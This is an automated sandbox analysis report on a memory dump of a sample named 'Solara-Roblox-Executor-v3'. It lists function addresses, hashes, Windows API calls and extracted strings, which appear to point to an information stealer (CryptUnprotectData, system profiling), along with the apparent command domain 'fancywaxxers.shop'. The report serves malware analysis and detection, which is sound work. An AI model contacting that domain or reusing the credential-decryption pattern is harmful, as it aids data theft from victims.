Source File: 00000006.00000002.2145098110.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_400000_Solara-Roblox-Executor-v3.jbxd

Similarity

API ID: Uninitialize
String ID: @C$C]$IP$ZV$fancywaxxers.shop$ssr$|}$QS$y{
API String ID: 3861434553-2220828355
Opcode ID: 8ec32a82f3126b400308a62f5df11fed1079a828d8b44a30aeaeb35521acffc4
Instruction ID: c610bb7a6f26eae1edb8d755431fd6f30510e5416d743ca2efd8223496c67b40
Opcode Fuzzy Hash: 8ec32a82f3126b400308a62f5df11fed1079a828d8b44a30aeaeb35521acffc4
Instruction Fuzzy Hash: F712EF7050C3D09ED3318F6598A439BBFE1AFE6310F184AADD0C95B392D739490ACB96

Function 00423811 Relevance: 14.4, APIs: 2, Strings: 6, Instructions: 418
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

RtlExpandEnvironmentStrings.NTDLL(00000000,?,0000000E,00000000,?), ref: 00423836

Strings

pj, xrefs: 00423B67
b=B, xrefs: 00423D50
\, xrefs: 00423C92
QE, xrefs: 00423C82
`8B, xrefs: 00423850
T^, xrefs: 00423D1F, 00423D23

Memory Dump Source

Source File: 00000006.00000002.2145098110.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_400000_Solara-Roblox-Executor-v3.jbxd

Similarity

API ID: EnvironmentExpandStrings
String ID: QE$T^$\$`8B$b=B$pj
API String ID: 237503144-3832622935
Opcode ID: 0cd9791aff82b6cd7fccf96c581a62d19902d81c30b2ea19fcab95dfeaf2d4eb
Instruction ID: 6363133fec5b291e7bd2b5c7661d9de21d388bc679ce722e98939a667b697044
Opcode Fuzzy Hash: 0cd9791aff82b6cd7fccf96c581a62d19902d81c30b2ea19fcab95dfeaf2d4eb
Instruction Fuzzy Hash: 50D1C9B0A083448FD710DF55E89162BBBF0FB86349F44892DF5998B352E3789945CB8A

Function 00408690 Relevance: 7.7, APIs: 5, Instructions: 211
threadCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetCurrentProcessId.KERNEL32 ref: 004086B4
GetCurrentThreadId.KERNEL32 ref: 004086BE
SHGetSpecialFolderPathW.SHELL32(00000000,?,00000010,00000000), ref: 004087CA
GetForegroundWindow.USER32 ref: 004088C5
ExitProcess.KERNEL32 ref: 00408931

Memory Dump Source

Source File: 00000006.00000002.2145098110.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_400000_Solara-Roblox-Executor-v3.jbxd

Similarity

API ID: CurrentProcess$ExitFolderForegroundPathSpecialThreadWindow
String ID:
API String ID: 4063528623-0
Opcode ID: d117fd8a260b4d1960ece9cdb3354f165178d4dd5b281eae34d4f7d0227ac3f6
Instruction ID: 8ede48481e1735f962ef943b25c32375d9938f45e32adf7daae5272a9be7713e
Opcode Fuzzy Hash: d117fd8a260b4d1960ece9cdb3354f165178d4dd5b281eae34d4f7d0227ac3f6
Instruction Fuzzy Hash: FA6176B7F043144BD718AE69CD8636AB5C69BC4310F1E853EA898EB3D1EE7C9C0582C5

Function 0042B8C3 Relevance: 3.8, APIs: 1, Strings: 1, Instructions: 331
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetPhysicallyInstalledSystemMemory.KERNELBASE(?), ref: 0042CCE5

Strings

mJ, xrefs: 0042CC1D

Memory Dump Source

Source File: 00000006.00000002.2145098110.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_400000_Solara-Roblox-Executor-v3.jbxd

Similarity

API ID: InstalledMemoryPhysicallySystem
String ID: mJ
API String ID: 3960555810-126070683
Opcode ID: f03efc9397f3033fe743b8df9adf057a632e3b820ccdadc1fd3a85e2bf9479ec
Instruction ID: d3edd6ecf3c5bcb37c2bc7934cbc24c1904aae8e85cd39f9a47c956bce1dc71a
Opcode Fuzzy Hash: f03efc9397f3033fe743b8df9adf057a632e3b820ccdadc1fd3a85e2bf9479ec
Instruction Fuzzy Hash: 8691F47050C3928AD739CF2994607ABBFE1AF96304F18486ED0C997292E7398506CB97

Function 00410BB3 Relevance: 2.4, APIs: 1, Instructions: 888COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000006.00000002.2145098110.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_400000_Solara-Roblox-Executor-v3.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 1e8737c3bbac419c073c8e73b68b15f7a7f2a9a6c96eb184638410891f8ec42c
Instruction ID: 86b5bbd252f56c8b31140c0c9175a5acd21a30d65fc6c0985deb9c3e02555efd
Opcode Fuzzy Hash: 1e8737c3bbac419c073c8e73b68b15f7a7f2a9a6c96eb184638410891f8ec42c
Instruction Fuzzy Hash: 6B721875A04B408FD714DF38C885396BBE2AF95314F198A3ED9EA877D2D638E445CB02

Function 0041726D Relevance: 1.8, APIs: 1, Instructions: 260encryptionCOMMON

Download Yara Rule

APIs

CryptUnprotectData.CRYPT32(?,00000000,00000000,00000000,00000000,00000000,?), ref: 00417422

Memory Dump Source

Source File: 00000006.00000002.2145098110.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_400000_Solara-Roblox-Executor-v3.jbxd

Similarity

API ID: CryptDataUnprotect
String ID:
API String ID: 834300711-0
Opcode ID: c38e4abd3a16c5d3d6da9e63e775c59da54069e2d095b0eb7f0d949787040c09
Instruction ID: 626973797c0056d3d8d6f11a3cdc509ba32d2cf50b32cf2ce84dace285bdcab7
Opcode Fuzzy Hash: c38e4abd3a16c5d3d6da9e63e775c59da54069e2d095b0eb7f0d949787040c09
Instruction Fuzzy Hash: CF81F4B150C2429FC724CF28C8517ABB7F1AF95314F18896EE49987392E738D986CB46

Function 0043C6B0 Relevance: 1.5, APIs: 1, Instructions: 14libraryCOMMON

Download Yara Rule

APIs

LdrInitializeThunk.NTDLL(0043FA9D,?,00000018,?,?,00000018,?,?,?), ref: 0043C6DE

Memory Dump Source

Source File: 00000006.00000002.2145098110.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_400000_Solara-Roblox-Executor-v3.jbxd

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: 428b37146f2ab8bbef251fdb989594d24ae2c5b49c4db8728953df82dacde34d
Instruction ID: 0c3231226d6b2b3a527619dcc08e6164a4fafcc19f94aab6dc14dc2c5ea58878
Opcode Fuzzy Hash: 428b37146f2ab8bbef251fdb989594d24ae2c5b49c4db8728953df82dacde34d
Instruction Fuzzy Hash: A2E0FE75908316AF9A08CF45C14444EFBE5BFC4714F11CC8DA4D863210D3B0AD46DF82

Function 0042D479 Relevance: 1.4, Strings: 1, Instructions: 174COMMON

Download Yara Rule

Strings

>, xrefs: 0042D5D4

Memory Dump Source

Source File: 00000006.00000002.2145098110.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_400000_Solara-Roblox-Executor-v3.jbxd

Similarity

API ID:
String ID: >
API String ID: 0-325317158
Opcode ID: 98223da683e24e277a8c5ed51c90ccc8e85816ab88d1a3cb8bed61bcff2eae68
Instruction ID: 60c150bb56a25fce4e0004a13e1ffe521c8b29bb56f0fa5ab9c04c764cccfbfe
Opcode Fuzzy Hash: 98223da683e24e277a8c5ed51c90ccc8e85816ab88d1a3cb8bed61bcff2eae68
Instruction Fuzzy Hash: 3D41AD21E086A24BD704CB2C98412B7FB91DF67354F59866ED8D5CB382D32CD846C3DA

Function 0043E910 Relevance: 1.3, Strings: 1, Instructions: 89COMMON

Download Yara Rule

Strings

@, xrefs: 0043E960

Memory Dump Source

Source File: 00000006.00000002.2145098110.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_400000_Solara-Roblox-Executor-v3.jbxd

Similarity

API ID: InitializeThunk
String ID: @
API String ID: 2994545307-2766056989
Opcode ID: 56665c6da26064b575c2537206edd939f3da4c3ac38f5dc4cd80a82db574da6b
Instruction ID: 6807644c5d023bddaf5b1f6096250f87d695de9c0eb8c49eb476749c76d675ad
Opcode Fuzzy Hash: 56665c6da26064b575c2537206edd939f3da4c3ac38f5dc4cd80a82db574da6b
Instruction Fuzzy Hash: 8421ABB55093009BD310DF19D88462BFBF9FFCA324F14A92DE59897391E33598048B6A

Function 00426470 Relevance: .3, Instructions: 331COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000006.00000002.2145098110.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_400000_Solara-Roblox-Executor-v3.jbxd

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: 2551022070fb84c9be72c7adfed6f47c8044bf460f669702c44befff69b69773
Instruction ID: 89752d59b22e552cc1b3624904c48c474edb0510461437a8e66cbbcbb2a827d3
Opcode Fuzzy Hash: 2551022070fb84c9be72c7adfed6f47c8044bf460f669702c44befff69b69773
Instruction Fuzzy Hash: B5918E72B043205BD7288F65FC8377BB292EBC5318F5A853EE98657381E67C9C05874A

Function 0043A940 Relevance: .3, Instructions: 254COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000006.00000002.2145098110.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_400000_Solara-Roblox-Executor-v3.jbxd

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: eb778ec77485ab17806605ecffe043a8dc004d260345baee18e2d7b4f2081fbe
Instruction ID: 9c8d90313b322bdcd2648fd3295d181bdb9ba862931c76569345c480668c26a6
Opcode Fuzzy Hash: eb778ec77485ab17806605ecffe043a8dc004d260345baee18e2d7b4f2081fbe
Instruction Fuzzy Hash: EF618C72B483004BE7289E25CC8177BB793EBC9314F19983ED6C55B392E6789C52874A

Function 0042BFE5 Relevance: 3.1, APIs: 2, Instructions: 87
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

FreeLibrary.KERNEL32(?), ref: 0042C015
GetComputerNameExA.KERNELBASE(00000006,?,00000100), ref: 0042C0CB

Memory Dump Source

Source File: 00000006.00000002.2145098110.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_400000_Solara-Roblox-Executor-v3.jbxd

Similarity

API ID: ComputerFreeLibraryName
String ID:
API String ID: 2904949787-0
Opcode ID: d96fea4e6257e4c78ffb554b289efb03b8e51e5e0d2c6f3ac5258e9002211423
Instruction ID: 8d9c6549bc25777c5240e84b17f1ca750e90f0eb3d57af2790fa8dbf1b0839c8
Opcode Fuzzy Hash: d96fea4e6257e4c78ffb554b289efb03b8e51e5e0d2c6f3ac5258e9002211423
Instruction Fuzzy Hash: FC2108716083918FC7358B25D8A0BEBBFE1AF8B304F54486DD0C9D7242DB354509D756

Function 0042BFE3 Relevance: 3.1, APIs: 2, Instructions: 69
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

FreeLibrary.KERNEL32(?), ref: 0042C015
GetComputerNameExA.KERNELBASE(00000006,?,00000100), ref: 0042C0CB

Memory Dump Source

Source File: 00000006.00000002.2145098110.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_400000_Solara-Roblox-Executor-v3.jbxd

Similarity

API ID: ComputerFreeLibraryName
String ID:
API String ID: 2904949787-0
Opcode ID: a43e626c617e0f5b7cb83e1fb4221ea60791d33f85f50ac47f0bb6e041d23e2b
Instruction ID: e6454d7e6264a6da6bf3dd5ff13132aeabb15ad0ac44c7d8a9f8b74ac14de22b
Opcode Fuzzy Hash: a43e626c617e0f5b7cb83e1fb4221ea60791d33f85f50ac47f0bb6e041d23e2b
Instruction Fuzzy Hash: 832124716183818BC7258F29D8A0BAFBBE5AF8A314F54886DD0CAD7251DB31450ADB16

Function 0042BF95 Relevance: 1.6, APIs: 1, Instructions: 67COMMON

Download Yara Rule

APIs

GetComputerNameExA.KERNELBASE(00000006,?,00000100), ref: 0042C0CB

Memory Dump Source

Source File: 00000006.00000002.2145098110.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_400000_Solara-Roblox-Executor-v3.jbxd

Similarity

API ID: ComputerName
String ID:
API String ID: 3545744682-0
Opcode ID: 580b99c8e626a2e61bb62fe38b60c0f15514af6f0c16ccc8df652c953a0a01b2
Instruction ID: 5cb1f8e390387c2d5bf378eb707ebf3e44180718c353ead536809b07d6827398
Opcode Fuzzy Hash: 580b99c8e626a2e61bb62fe38b60c0f15514af6f0c16ccc8df652c953a0a01b2
Instruction Fuzzy Hash: 231159716083818BC725CF29D8A0BEBBBD59F8A314F548C6DC0C9D7241DB31450AD716

Function 0042D863 Relevance: 1.6, APIs: 1, Instructions: 58COMMON

Download Yara Rule

APIs

GetComputerNameExA.KERNELBASE(00000005,?,00000100), ref: 0042D8FE

Memory Dump Source

Source File: 00000006.00000002.2145098110.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_400000_Solara-Roblox-Executor-v3.jbxd

Similarity

API ID: ComputerName
String ID:
API String ID: 3545744682-0
Opcode ID: a0f2b7ae8f42de89da95dabbfb162138e3e028de9b94eaaaacad31c45893ab19
Instruction ID: b1328b629a4901df70fe6737cf23ebc979e758bad0d5d00b5efd17457f7cace7
Opcode Fuzzy Hash: a0f2b7ae8f42de89da95dabbfb162138e3e028de9b94eaaaacad31c45893ab19
Instruction Fuzzy Hash: 2101D27450C3D08BD724DB25D4587ABBFE5AFA6704F288CADD4D68B341CA345405CB66

Function 004366F3 Relevance: 1.6, APIs: 1, Instructions: 58COMMON

Download Yara Rule

APIs

GetUserDefaultUILanguage.KERNELBASE ref: 0043672B

Memory Dump Source

Source File: 00000006.00000002.2145098110.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_400000_Solara-Roblox-Executor-v3.jbxd

Similarity

API ID: DefaultLanguageUser
String ID:
API String ID: 95929093-0
Opcode ID: 1c81b3708a00711999cbdb9b5a6b5a899258ba297497b33ab73c7a36183b33ab
Instruction ID: 280fd79d06aff116d5ecce700f831f7330868030a01968b370003e1ee4d4f53d
Opcode Fuzzy Hash: 1c81b3708a00711999cbdb9b5a6b5a899258ba297497b33ab73c7a36183b33ab
Instruction Fuzzy Hash: 4721C2369042668FCB24CF3D8C412EEBBF0AB4A310F0945EDD458E7381DA344A41DF91

Function 0043C50F Relevance: 1.5, APIs: 1, Instructions: 49libraryCOMMON

Download Yara Rule

APIs

LoadLibraryExW.KERNEL32(?,00000000,00000800), ref: 0043C577

Memory Dump Source

Source File: 00000006.00000002.2145098110.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_400000_Solara-Roblox-Executor-v3.jbxd

Similarity

API ID: LibraryLoad
String ID:
API String ID: 1029625771-0
Opcode ID: 9579234a0d3020c9bbccd6177cbaeb44dce239ed60d1b0632adf1eb9ca13027a
Instruction ID: 911dd8d51dd45e87027dc5049aa6d8bf0b8fc62c940d04092f590b9884291e7f
Opcode Fuzzy Hash: 9579234a0d3020c9bbccd6177cbaeb44dce239ed60d1b0632adf1eb9ca13027a
Instruction Fuzzy Hash: 5301ADB86816029FD7088F34AC6162ABB70FB57710F18C12ED552E7791DB38B8229F94

Function 0043C640 Relevance: 1.5, APIs: 1, Instructions: 42memoryCOMMON

Download Yara Rule

APIs

RtlReAllocateHeap.NTDLL(?,00000000,?,?,?,?,0040B3B6,00000000,00000001), ref: 0043C672

Memory Dump Source

Source File: 00000006.00000002.2145098110.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_400000_Solara-Roblox-Executor-v3.jbxd

Similarity

API ID: AllocateHeap
String ID:
API String ID: 1279760036-0
Opcode ID: 039a965a5e932348f0846b263a11a7da3d88cac10f9e3f4e98b20a01168dd203
Instruction ID: ed897db68d2f824ce5d4c6ea69fbebf55ae07169fcb8736336b4f2104763bcd3
Opcode Fuzzy Hash: 039a965a5e932348f0846b263a11a7da3d88cac10f9e3f4e98b20a01168dd203
Instruction Fuzzy Hash: 79F0A77A55C210ABD2045F25BC06A1B37A8DF8F710F011839E405A2156D739F81286AE

Function 00430999 Relevance: 1.5, APIs: 1, Instructions: 25COMMON

Download Yara Rule

APIs

CoSetProxyBlanket.COMBASE ref: 004309DE

Memory Dump Source

Source File: 00000006.00000002.2145098110.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_400000_Solara-Roblox-Executor-v3.jbxd

Similarity

API ID: BlanketProxy
String ID:
API String ID: 3890896728-0
Opcode ID: aa80bd4a295446294ac11a8a10524a2e6beea580fe1d5e111643b3ff0549dc68
Instruction ID: 4ace6a5d690975b11af3c4666b26e1e77f09e9929f410ab7eb8611b0893769a0
Opcode Fuzzy Hash: aa80bd4a295446294ac11a8a10524a2e6beea580fe1d5e111643b3ff0549dc68
Instruction Fuzzy Hash: 25F0D0B49047018FD344DF14D56571BBBE1EB85304F10C82DE4958B350DB7A9548CF82

Function 00432527 Relevance: 1.5, APIs: 1, Instructions: 24COMMON

Download Yara Rule

APIs

CoSetProxyBlanket.COMBASE ref: 00432570

Memory Dump Source

Source File: 00000006.00000002.2145098110.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_400000_Solara-Roblox-Executor-v3.jbxd

Similarity

API ID: BlanketProxy
String ID:
API String ID: 3890896728-0
Opcode ID: d0d7fe7544170d5ae8f9228bf6cfad8d882ca38c8cdb98503c4a93d1490b5fb7
Instruction ID: 985d7c46c4c91835716fd23372d47f8b671b66ea7a8bf13cfef953cc70728e13
Opcode Fuzzy Hash: d0d7fe7544170d5ae8f9228bf6cfad8d882ca38c8cdb98503c4a93d1490b5fb7
Instruction Fuzzy Hash: 97F0A4B46083428FE310DF25D56974BBBE1BBC5308F15891CE0944B390C7B9A9498B82

Function 0040C650 Relevance: 1.5, APIs: 1, Instructions: 17COMMON

Download Yara Rule

APIs

CoInitializeEx.COMBASE(00000000,00000002), ref: 0040C663

Memory Dump Source

Source File: 00000006.00000002.2145098110.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_400000_Solara-Roblox-Executor-v3.jbxd

Similarity

API ID: Initialize
String ID:
API String ID: 2538663250-0
Opcode ID: e5cd34cbafc55f1e7eddfbd2313b39ad9063b4238026ba4bb9fbe934c854d4e3
Instruction ID: 069f7b1c6f19c039f18f438670f1ef35198aa9731d00d4267406a3f8b0e2fb98
Opcode Fuzzy Hash: e5cd34cbafc55f1e7eddfbd2313b39ad9063b4238026ba4bb9fbe934c854d4e3
Instruction Fuzzy Hash: B3D0A7355545487FD204BB1CDC47F16361CD787B55F500235B2A3D66D2D9107A14C569

Function 0040C683 Relevance: 1.5, APIs: 1, Instructions: 17COMMON

Download Yara Rule

APIs

CoInitializeSecurity.COMBASE(00000000,000000FF,00000000,00000000,00000000,00000003,00000000,00000000,00000000), ref: 0040C695

Memory Dump Source

Source File: 00000006.00000002.2145098110.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_400000_Solara-Roblox-Executor-v3.jbxd

Similarity

API ID: InitializeSecurity
String ID:
API String ID: 640775948-0
Opcode ID: 440e95b38ebb1a844790dba98f5f82c4b8900d51c08e1cc0e09fc6c1cb957324
Instruction ID: b43cd1d53a2aed40e5e2bc9aaae7e1c6e016ab282fe32541eb982d374b7614db
Opcode Fuzzy Hash: 440e95b38ebb1a844790dba98f5f82c4b8900d51c08e1cc0e09fc6c1cb957324
Instruction Fuzzy Hash: 9ED0C9787D43817AF274AB18EC63F1032109702F22F340629B362FE6E1CAD0B301860C

Function 0043C7B9 Relevance: 1.5, APIs: 1, Instructions: 16COMMON

Download Yara Rule

APIs

GetForegroundWindow.USER32 ref: 0043CE49

Memory Dump Source

Source File: 00000006.00000002.2145098110.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_400000_Solara-Roblox-Executor-v3.jbxd

Similarity

API ID: ForegroundWindow
String ID:
API String ID: 2020703349-0
Opcode ID: 69f1cfd33be66feae47a3d15702f4a44d718e84a6ec68eb824ba433d2b08b24d
Instruction ID: d36a51164de634362bc0c348a54f1afaed1d160a280bd37972b66b24d3067254
Opcode Fuzzy Hash: 69f1cfd33be66feae47a3d15702f4a44d718e84a6ec68eb824ba433d2b08b24d
Instruction Fuzzy Hash: D7E017FCA14200AFD604DF2AFC564293768E70E38A7141C39E203E3362EA35A516CF1A

Function 0043A910 Relevance: 1.5, APIs: 1, Instructions: 15memoryCOMMON

Download Yara Rule

APIs

RtlFreeHeap.NTDLL(?,00000000,078F0570,0040AD69,?), ref: 0043A930

Memory Dump Source

Source File: 00000006.00000002.2145098110.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_400000_Solara-Roblox-Executor-v3.jbxd

Similarity

API ID: FreeHeap
String ID:
API String ID: 3298025750-0
Opcode ID: aa77b153df83aa0648d4e5ef14955a0dee6a28c9eb21a15ecce94dcc0288dfb2
Instruction ID: 1bec28ab9f426d7cf4e5273d770ae0e455ce1304f948499519ea945e8e9a7362
Opcode Fuzzy Hash: aa77b153df83aa0648d4e5ef14955a0dee6a28c9eb21a15ecce94dcc0288dfb2
Instruction Fuzzy Hash: 50D0C936409126FBC6106F18BC05BCB3A54EF49321F0718A1F440AA065D764EC92CAD8

Function 0043A8DB Relevance: 1.5, APIs: 1, Instructions: 9memoryCOMMON

Download Yara Rule

APIs

RtlAllocateHeap.NTDLL(?,00000000), ref: 0043A8E1

Memory Dump Source

Source File: 00000006.00000002.2145098110.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_400000_Solara-Roblox-Executor-v3.jbxd

Similarity

API ID: AllocateHeap
String ID:
API String ID: 1279760036-0
Opcode ID: 618dd1765a81cefc2703dc6892598b615660d8e824fcd20375fc210db13e00eb
Instruction ID: 3f4af44d4470a0fbe172d2908791aabd4b850efe916076a1a4cc36af0c283a21
Opcode Fuzzy Hash: 618dd1765a81cefc2703dc6892598b615660d8e824fcd20375fc210db13e00eb
Instruction Fuzzy Hash: 3DB09238588200AFD2188F00DC18F757B39AB0B352F202024A0496B9B29720D841CA4C

Non-executed Functions

Function 00423DB0 Relevance: 53.6, APIs: 3, Strings: 27, Instructions: 1071COMMON

Download Yara Rule

APIs

RtlExpandEnvironmentStrings.NTDLL(00000000,?,0000001E,00000000,00000000), ref: 00423E87

Strings

T3, xrefs: 00424697
As, xrefs: 00423DE2
,x"~, xrefs: 00424DC1
?9, xrefs: 004246A2
Y0X6, xrefs: 00424CFB
y~, xrefs: 00423DF2
<z1x, xrefs: 00424423
LM, xrefs: 00424681
IK, xrefs: 0042458F
KM, xrefs: 0042468C
IK, xrefs: 00424AC8
?~1|, xrefs: 00424418
s ]&, xrefs: 00424D27
,K, xrefs: 00423DDA
;D6J, xrefs: 00424D8A
P4P:, xrefs: 00424D06
du, xrefs: 00423DEA
EG, xrefs: 00424ABD
G8h>, xrefs: 00424D11
j<o", xrefs: 00424D1C
Q2z0, xrefs: 00424389
:h>n, xrefs: 00424DED
7d1j, xrefs: 00424DE2
6\1B, xrefs: 00424D74
*|:b, xrefs: 00424DCC
)`+f, xrefs: 00424DD7
<P-V, xrefs: 00424D53

Memory Dump Source

Source File: 00000006.00000002.2145098110.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_400000_Solara-Roblox-Executor-v3.jbxd

Similarity

API ID: EnvironmentExpandStrings
String ID: )`+f$*|:b$,x"~$,K$6\1B$7d1j$:h>n$;D6J$<P-V$<z1x$?~1|$?9$As$G8h>$KM$LM$P4P:$Q2z0$T3$Y0X6$du$j<o"$s ]&$y~$EG$IK$IK
API String ID: 237503144-176486204
Opcode ID: 4ea41a74095953a6bb104565ec8e8e82e4ba0b91258274c99b903924837fbaf0
Instruction ID: 52e58aca3063a9a47ea7f5c312e0c4d4e6097df5b0b40be0427110893b3f2291
Opcode Fuzzy Hash: 4ea41a74095953a6bb104565ec8e8e82e4ba0b91258274c99b903924837fbaf0
Instruction Fuzzy Hash: C09285B560C3808BD734CF64D841BABBBF1FB85304F40892DE5D99B252D7B58906CB86

Function 004240B0 Relevance: 44.7, APIs: 2, Strings: 23, Instructions: 986COMMON

Download Yara Rule

Strings

T3, xrefs: 00424697
EG, xrefs: 00424ABD
,x"~, xrefs: 00424DC1
?9, xrefs: 004246A2
G8h>, xrefs: 00424D11
Y0X6, xrefs: 00424CFB
<z1x, xrefs: 00424423
j<o", xrefs: 00424D1C
Q2z0, xrefs: 00424389
:h>n, xrefs: 00424DED
LM, xrefs: 00424681
IK, xrefs: 0042458F
KM, xrefs: 0042468C
IK, xrefs: 00424AC8
7d1j, xrefs: 00424DE2
?~1|, xrefs: 00424418
s ]&, xrefs: 00424D27
6\1B, xrefs: 00424D74
;D6J, xrefs: 00424D8A
*|:b, xrefs: 00424DCC
P4P:, xrefs: 00424D06
)`+f, xrefs: 00424DD7
<P-V, xrefs: 00424D53

Memory Dump Source

Source File: 00000006.00000002.2145098110.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_400000_Solara-Roblox-Executor-v3.jbxd

Similarity

API ID:
String ID: )`+f$*|:b$,x"~$6\1B$7d1j$:h>n$;D6J$<P-V$<z1x$?~1|$?9$G8h>$KM$LM$P4P:$Q2z0$T3$Y0X6$j<o"$s ]&$EG$IK$IK
API String ID: 0-1817150213
Opcode ID: f107c8039fb28611d21461d02613db359083f692f33b9db2ad77000e318ed1ca
Instruction ID: 729a02ce9405a37de42b7df271b0d41c1cfd89f57b3d10eb943a613648fac085
Opcode Fuzzy Hash: f107c8039fb28611d21461d02613db359083f692f33b9db2ad77000e318ed1ca
Instruction Fuzzy Hash: D99273B560C7818BD734CF64D842B9BBBF1FB82304F40882EE5D99B242D77585068B97

Function 00424200 Relevance: 44.7, APIs: 2, Strings: 23, Instructions: 948COMMON

Download Yara Rule

Strings

T3, xrefs: 00424697
EG, xrefs: 00424ABD
,x"~, xrefs: 00424DC1
?9, xrefs: 004246A2
G8h>, xrefs: 00424D11
Y0X6, xrefs: 00424CFB
<z1x, xrefs: 00424423
j<o", xrefs: 00424D1C
Q2z0, xrefs: 00424389
:h>n, xrefs: 00424DED
LM, xrefs: 00424681
IK, xrefs: 0042458F
KM, xrefs: 0042468C
IK, xrefs: 00424AC8
7d1j, xrefs: 00424DE2
?~1|, xrefs: 00424418
s ]&, xrefs: 00424D27
6\1B, xrefs: 00424D74
;D6J, xrefs: 00424D8A
*|:b, xrefs: 00424DCC
P4P:, xrefs: 00424D06
)`+f, xrefs: 00424DD7
<P-V, xrefs: 00424D53

Memory Dump Source

Source File: 00000006.00000002.2145098110.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_400000_Solara-Roblox-Executor-v3.jbxd

Similarity

API ID:
String ID: )`+f$*|:b$,x"~$6\1B$7d1j$:h>n$;D6J$<P-V$<z1x$?~1|$?9$G8h>$KM$LM$P4P:$Q2z0$T3$Y0X6$j<o"$s ]&$EG$IK$IK
API String ID: 0-1817150213
Opcode ID: 6cd765818cc6bfd8133304f011d9cc142fa429ab1a8a1dff29106b8c59bacd27
Instruction ID: e0c27a7199b10ba4e9966607cc2369be5114a7ee68ebb573e7d484185c4e1b46
Opcode Fuzzy Hash: 6cd765818cc6bfd8133304f011d9cc142fa429ab1a8a1dff29106b8c59bacd27
Instruction Fuzzy Hash: 298272B560C7818BD734CF24D842B9BBBF1FB82304F408D2DE5D9AB252D6758546CB86

Function 0040C6B5 Relevance: 22.8, Strings: 18, Instructions: 281COMMON

Download Yara Rule

Strings

7U9W, xrefs: 0040C975
WHwd, xrefs: 0040C788
eI?K, xrefs: 0040C954
